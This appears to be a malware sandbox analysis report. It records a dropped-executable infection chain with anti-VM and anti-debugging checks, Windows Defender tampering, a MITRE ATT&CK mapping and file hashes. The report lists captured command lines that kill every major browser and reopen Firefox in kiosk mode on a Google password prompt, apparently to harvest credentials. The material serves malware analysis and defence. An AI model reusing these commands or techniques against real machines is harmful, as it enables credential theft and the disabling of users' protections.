C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe"C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2016
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2900 -s 8007⤵
- Program crash
PID:2104
-
-
-
C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe"C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2936 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"7⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:1432
-
-
-
C:\Users\Admin\AppData\Local\Temp\10110540101\a84d3ad71d.exe"C:\Users\Admin\AppData\Local\Temp\10110540101\a84d3ad71d.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3584
-
-
C:\Users\Admin\AppData\Local\Temp\10110560101\563315ef27.exe"C:\Users\Admin\AppData\Local\Temp\10110560101\563315ef27.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3044
-
-
C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe"C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5048 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:836
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2872
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3920
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4860
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3224
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:2324
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4776 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1996 -parentBuildID 20240401114208 -prefsHandle 1924 -prefMapHandle 1916 -prefsLen 27352 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f471028b-8d0e-4c0d-844c-b7c707138204} 4776 "\\.\pipe\gecko-crash-server-pipe.4776" gpu9⤵PID:4960
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2432 -parentBuildID 20240401114208 -prefsHandle 2424 -prefMapHandle 2412 -prefsLen 28272 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e60a7b15-7d1f-4dc5-98bf-11a5d4d8f05b} 4776 "\\.\pipe\gecko-crash-server-pipe.4776" socket9⤵PID:4220
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3116 -childID 1 -isForBrowser -prefsHandle 3288 -prefMapHandle 3232 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c65ca5cb-f2ce-4287-9238-a64074ae4de6} 4776 "\\.\pipe\gecko-crash-server-pipe.4776" tab9⤵PID:1804
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4080 -childID 2 -isForBrowser -prefsHandle 4056 -prefMapHandle 4052 -prefsLen 32762 -prefMapSize 244628 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5e02e047-153a-4efd-90cd-b8b013d6e537} 4776 "\\.\pipe\gecko-crash-server-pipe.4776" tab9⤵PID:3484
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4952 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4928 -prefMapHandle 4912 -prefsLen 32762 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9a84c741-04d9-457f-8ef3-68323687c6a2} 4776 "\\.\pipe\gecko-crash-server-pipe.4776" utility9⤵
- Checks processor information in registry
PID:5212
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4928 -childID 3 -isForBrowser -prefsHandle 5244 -prefMapHandle 5248 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {44683e53-4e36-41cc-9d3a-d55400203641} 4776 "\\.\pipe\gecko-crash-server-pipe.4776" tab9⤵PID:6108
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5352 -childID 4 -isForBrowser -prefsHandle 5396 -prefMapHandle 5404 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {afcb5a54-ddfa-4fca-b3ae-fda6b1b10b1c} 4776 "\\.\pipe\gecko-crash-server-pipe.4776" tab9⤵PID:6120
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5584 -childID 5 -isForBrowser -prefsHandle 5540 -prefMapHandle 5380 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5f4c1057-c3e5-47cd-bad4-f599bf770f88} 4776 "\\.\pipe\gecko-crash-server-pipe.4776" tab9⤵PID:6132
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe"C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5624
-
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2900 -ip 29001⤵PID:512
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:772
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3664
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3420
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
5Disable or Modify Tools
5Modify Registry
6Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
Filesize
987KB
MD5f49d1aaae28b92052e997480c504aa3b
SHA1a422f6403847405cee6068f3394bb151d8591fb5
SHA25681e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0
SHA51241f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\activity-stream.discovery_stream.json
Filesize24KB
MD54a49051c1914633ce83836ecc8956b4e
SHA19e25150168216dcc924242c2db31653165846b7e
SHA2561624898a74941700ec9a09972b7f1ae607105fb6cc393846ba29963bc7a2fd19
SHA512e953575d73b413fb2fb568b217e4ee5f565e7c238e767ecf5e07fdbddc5bf78a1d71970fb39fae23f86c5e635cf0de18169c5ca2ed0081ee830665c0b3ee83fb
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\cache2\entries\8DF0E9F84C5909278CF68CB55A683669F40995FB
Filesize13KB
MD5917c3e6321d9f4fd8652fca32aac6d6b
SHA101e0cd1bad70560b7f28aa7da8707860165820b5
SHA25674cb9ab31073de9e121dde61f113cd4ff17eaf598e12c4c3b325769a6ac4ec91
SHA51244870eea95ed2d64c3080a98abd8f417e8a6df208d476f0a6517318b5c28e225d22125d25bc2a9d0b95fb4f6dc5519e666f55ffa0d08d7c5189b70ec56a20104
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\cache2\entries\ADF5BD09EB688DAB1F35EE02E8C35329D0E4AD89
Filesize13KB
MD5110bc7ae6bd1709c151f2989f7883919
SHA1b8a082d6980bb997a64ffd6d92a8bdefd742d20a
SHA256898016830d29947e641ba662367662a64ffc3a7996d661b606bbcc78dd232eda
SHA51223a8f03d8bfbf33f0752a88906b2fb2ca5dec7db2bca35a30f011ce2cdc550288d2107ceb7b27e384d9f8343b700a60f595d8bcfa977564313f104f578b59d21
-
Filesize
1.8MB
MD593da4bdbae52d91d32a34c140466e8cf
SHA12177f234160ef77058d2237a8f97c1d663647240
SHA256878228e580cd27a72a847922f9b16b7d16d0797c68aa9e6642ae3da13518de7a
SHA51214d14d6d8d436953ed43483b8b3ba30a4f1df73eb2eca055c047bb0b7e328150ae0c49122a657f5f8ab752872e5d40b791e793675110df5c90440077f446b91a
-
Filesize
3.7MB
MD57ebfd3c200d1cef79141205b2232d04e
SHA19507b4780dc90ac98995ab6987cb76cc3e85cf3d
SHA256ee097a32ba863725396bd41b54d0dc023d1a15e7e619cd009e93047e4c95be38
SHA51217cae57fb8194b470e8abc3a5072b2f63a119e10dfc6b44456123f4493632b01bb1e80d15121f63f0dc48c5050c90109c1d17c6ffccd470c11d1e8f36874b73f
-
Filesize
445KB
MD5c83ea72877981be2d651f27b0b56efec
SHA18d79c3cd3d04165b5cd5c43d6f628359940709a7
SHA25613783c2615668fba4a503cbefdc18f8bc3d10d311d8dfe12f8f89868ed520482
SHA512d212c563fdce1092d6d29e03928f142807c465ecaaead4fe9d8949b6f36184b8d067a830361559d59fc00d3bbe88feda03d67b549d54f0ec268e9e75698c1dd0
-
Filesize
4.5MB
MD5cc1a40ae718a316ece1fa40898297c32
SHA11400b072dffc6b9300e48b35bbb8f9f9a93ae357
SHA2560f00394667da2e8756cbc43b414f053e2923b77198e7972710a4f643d3d9437c
SHA512af551538724552dc4699a82c8324c83c17187b13afa716de359e891ff2d66f9a5a00de817dc73294d635a2c71a49ee3374f91eae40c9730ec776c8c1907bd5bd
-
Filesize
1.8MB
MD5ecbd88e7bb854e4ce89e94f5e76d0116
SHA12a2415f6db7d9bf6ec445cadd57d0ef7cd8e66fd
SHA256c2dbaaa27274e1b7eab4c2d13dff48715ae8afc54201b2d469f6fca8364f5684
SHA512cf477fdd53d86ffa90d5529f80fb4f70dac75b5c486ffca7a2be614a6be93de21a293ad24a7ccb3cf8729dcebd64105c25b4cf2db1a0704a7ef36bb1a52a3020
-
Filesize
2.4MB
MD5ec5b5dbeee457eade1319136d786850b
SHA10e6a0d30c3048a511e7d90c4759af1f11384692c
SHA256d5ecff66c02169361b784ecab66f17ca6ebb39e1064c584ed1a77408f3e50b62
SHA512593e884fd85ef3fddc8578ba6568062e764093ab6281c248c33ffa76e9fd448ee3690942f67d8523ba222f78b1ed9a063aed935c1f55e5fc60a13fb5d8561339
-
Filesize
1.7MB
MD5629300ff81436181f8f475448ae88ccc
SHA126d771f0ec5f24c737708a0006d17d2d41b43459
SHA2569e33286f53f3ce4b98cb00dca5c365c82a0c1ded9ef0402d7d4270a607c127e6
SHA512467559eb2ada21818816f4713501ee944694875b57ccd721d92b5507f6fcaf1020ffcb1bbc5f41264f6d777701a1e4607ae06277d74fc4e1e0d4477b5b433da0
-
Filesize
945KB
MD5de9fdda5de6c4dfaffb86be4ee98d70a
SHA1c0c4a6ae8003f5508c92c8bbb037c49fff06a5c3
SHA256952b6fb34399b787bae14c027165482d38c5355e16d6f1d9f84fa62e6c7c6c92
SHA51274e44c48e92b0f4ad763dbed41b9252072e0ad27dfef651460fd1500fdfc11ef164853aabb056a71b0d4df01975efd8bfd111565a80ad79b441ab544b1c14592
-
Filesize
1.7MB
MD58564841b483e528b91605c2be1b8ccf5
SHA15f46911b3c1cb8199f13d0110ebd6d76232a6cc4
SHA256eed57746d76ad12b0bb7f4f4797c2929c71c58bdf953caa41b1464b925642ce2
SHA512480eb504430e3156f5e3be7ec724e187fb8c214d0ff306d5af99904414a17a648cfd345f100c9a6d31e6e18c695f1b8647b3c05961e8296bcb2aa9a548a65484
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
534KB
MD506f2bf604094d7a50950c63a42472d7b
SHA14001209cfe41b43f6b1e0940b41fada952a3883c
SHA2567da60962ee6d1a9e1ac49c968f645d6ed74ef379c2df1144ee61d92bccd71a01
SHA512f157e3dba866a23846c5d31fb75ddea909fd497e37663f17bf4fcc6c70ff94316fcdf98c300ffa639ae355c9de3d9e2fc7706d1cbdd22c53fe0b42db1f02e4db
-
Filesize
720B
MD54e701582cd99c1553aa60dccfd9d98dd
SHA130bdcc5da83588b5607a8e44300e26d61a9e4d94
SHA256ef0c98f3a26c461d88247989f55403d5837a8569893338df2f0d9fa442b3053d
SHA512de9512e80a396223824eabb06839a486f6009c1f676a07b7669d2fe91ff6c4e00f98e0fc7b34d97ee63964ad9aab8a1d258173ce3ecb714feb981082c40c8880
-
Filesize
479KB
MD509372174e83dbbf696ee732fd2e875bb
SHA1ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1
-
Filesize
13.8MB
MD50a8747a2ac9ac08ae9508f36c6d75692
SHA1b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA25632d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA51259521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\AlternateServices.bin
Filesize13KB
MD57b9194844289ccc315e4eb1e6e0244a7
SHA1908c3356df0eb71cdccc9465ec29d4a8992b4669
SHA2569ffacb3e098c9f0f65afa2e90e6f7feeb18aa40aaa801f66eb3709aed1832016
SHA5129be58d83b8a4539f8db2c47d2c79d507a5db935ed4d2b3a69a37d1813fac0b7f0178ceea77e4d220c2b4db8901b35cedfdaca260b13fb70c7b0f8d6ef64062ca
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\datareporting\glean\db\data.safe.tmp
Filesize5KB
MD5189d6a8d8fc3de232f582fa506a67f4c
SHA1d81ff8c5f86e7602b699f8be8259ac10a5504043
SHA25607ad29eae1fb3a4858eb5f19f46994c29415899b5bf5fe1279407d17eda59aef
SHA512a08bf1c4d584cdcacf810ea917098ce37d30144dbff83c0182b5d58d3f5bf9bf75a980e491e2df48bc37f325075128d5d3f8f06e8f795aec176ad39f5b7bd214
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\datareporting\glean\db\data.safe.tmp
Filesize15KB
MD53935a21b6e1a3295e1ba457908701d64
SHA15a48fd17e6fd6cffa139a395dd38182f6971e4c2
SHA256c68ebc6b0cf81b5e367fbca67be38597852e41d10fb8f3573984af8a61709960
SHA5124bbce353b2b3358136f0798825f01a0411e00639d23e0385a884a6eb36048f6ab60a455277a15a8ac87209769e24bafd323a38675b0766196aadd1248410160b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\datareporting\glean\db\data.safe.tmp
Filesize6KB
MD589cb8e8b0f29afeef20d46d627684784
SHA1929876fc7b746e46472eb35bfb1e663d5cafef9a
SHA25671e60edd60e5a9072ab01d3d11b6198a1247b4280d4ba61984f862d4d2be03c7
SHA51270d46d4ffd8cc1e7f522e855d810c9af7b45acb445d4460f6be77016bd72ad5d2aaf1580ccac7d77581c1003a1a61923902b12124fde198f65206086c593758b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\datareporting\glean\db\data.safe.tmp
Filesize3KB
MD587449ff0d108552ed663f402e5e4dc95
SHA13ad7695a8dc79ecc17c7085479e4d38257d9c19b
SHA256223a65beffb7cc3f80897a652cc494722d1caac04ade3a6e3fbee4bde0754250
SHA5121da36b3498b6e00776aa58b96cc9c9a2605c5dbf5165dd995151d50bccbf0bd08ac587a3a059b888b69a5bdbac3bf627c2cfaddfd1d31c6c5abee1f17ad239d7
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\datareporting\glean\pending_pings\326254d2-556d-42f7-a818-c2d006b4bc2f
Filesize982B
MD59ecda4bcedb75d4477b4ebe4cf57fd50
SHA12536668c721e978b657f94b8d1d07e2688a05b6a
SHA2563273f2deba9f35f89517ca972979b963120b43e24a919c1e245c916937c75170
SHA5124d3a4d8025b4fe3585b505623f28754a904a0e1aebcaf76f900e30fe258342e5036d266199da8ab76d55282489edafb329c69218bd7306d83a2149806305ef1b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\datareporting\glean\pending_pings\8b2cb0da-e4ce-4ce7-a6d3-dd58971d512a
Filesize28KB
MD5518eb2b9c9860a34ec53e39a01423ae4
SHA1da3f10ba7866b172b8cbc0358e58bb69dca2a2ac
SHA256648038a2d087d40e019c7efbb6a6ccde079a045f0b2d93bf03de069311bbccb4
SHA5129d653362d235b6cab6eb960d4f1977055a25f5bac27749b16419f8e0e7fb405afd19195764d950149d6dfe084ad2b1720b429ae95ba4ab7b5ebb84db9bc09d10
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\datareporting\glean\pending_pings\b2e3645d-9841-4288-8926-32b248fbdfc5
Filesize671B
MD560d6bb06f2239570fb2c6be8ef27e529
SHA1a3f1545609d275d3b621bac4e78df17af4acb0cd
SHA25626f179e62ba3927f2ab51ccbed5e0a3eee744159ea8da24d1a7c1b71428b5775
SHA51254616ccde59820f4985e7de1564198c6a295989c76da12129d456ed636404031cec8a3faadf5bbf0f1119003e814c0206e8c83c7418b6a77cd1d05cc83acc0b7
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
Filesize1.1MB
MD5842039753bf41fa5e11b3a1383061a87
SHA13e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
Filesize116B
MD52a461e9eb87fd1955cea740a3444ee7a
SHA1b10755914c713f5a4677494dbe8a686ed458c3c5
SHA2564107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA51234f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
Filesize372B
MD5bf957ad58b55f64219ab3f793e374316
SHA1a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA51279c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
Filesize17.8MB
MD5daf7ef3acccab478aaa7d6dc1c60f865
SHA1f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA5125840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75
-
Filesize
15KB
MD5cc6fcbc0df531a05fbde0a8e727387d6
SHA1e258517c85ab990b056dc36d49e47b285205c613
SHA256050aff07021a039dcd31c1182228d9537ccda931d7e109bd968c543b7ed6dcf9
SHA512feec0c0c545c66214f4a62fd34107c557d1f8f5b2a225fdbe639c06f3b318d327895d7184e90b8b58d8f34683dae5fecd3a43e64d8ed6598996e82b51a4ee859
-
Filesize
9KB
MD54874f06decaf2e1b7508f4ccd5f3d5ba
SHA14e4d48e8271c1ce9b0ffae5411a9e0bbdc28f139
SHA256829a4a7d57389530925afbc4f65338b3b45623844082791a0b9d498145c966fd
SHA51278f153a492f87495df737609fea616870c0b9f0c2e6e9821e9cf8b5d90998c83e27466efeb9a9a2f66f31c78be0e6542c924090a94fca3af5b4a23a2518886ee
-
Filesize
10KB
MD582f9c241e66d06b758ba9d4233903153
SHA1812ccf2a07e539c62c81e1587b83d38ef49bf802
SHA256aa009c5b0244e6ff24f1fd3d818b5b28da576bf957c703a9c0f499f5e29a560c
SHA51218d217ae0312935722dab208a029965abf0fc9854bca10d590ac697fdaf6423b6fff56ecd6bce58cec1d34c98a786f0eb48eaa9a70a05ed951072e368fdc3f10
-
Filesize
9KB
MD5f69129fa6e21da91d2a81ff8823d0231
SHA145ede2673ba843acd3309315f6eb4b09989a2fca
SHA256275554a12321eaecd0149b6a946b7c32956223c03cb7a010a0c7fa4683f1a8ee
SHA5121d5fe06f69ba5f08f344c718e0e175c9c17ce09de00669630e5a5682e42579c65b823bad71729b251578197dd19949d3aeaa6afdfba9682d3b0dac1add757763
-
Filesize
10KB
MD5fd48a8ad9553e0274c24d79df27c05a6
SHA1b0642747b04b4dadfc5f651728c7c4143e1e9b60
SHA256719c37a7098ac3ccf37999c3f06effb828854a8452ebe2f80693a44f0199169a
SHA512233875755d996ec91543c7c0d7af9073c8268f74d474d9eca6abe4e4aae22b4a3b3f3e8aae6873e9c24c8e57465651f2bbdd686702404dd519433f55bdcb47f3
-
Filesize
2KB
MD57d823cfccec530f4b99d2d7de99876c2
SHA1c0ee9c44ed3b6cffc0923139fb311716be2e84e0
SHA256149a85238d404a6b84a77213dfd01a3811d6b2fe91959a7c444037c88203edec
SHA512637f936d82db378a901b4f896e2dfdeddee836d98b0fe9dcc38c16c382441c9f34fd09fea799fe44624021068b531cd8a518286a9934ed1786568f0b3e6c06df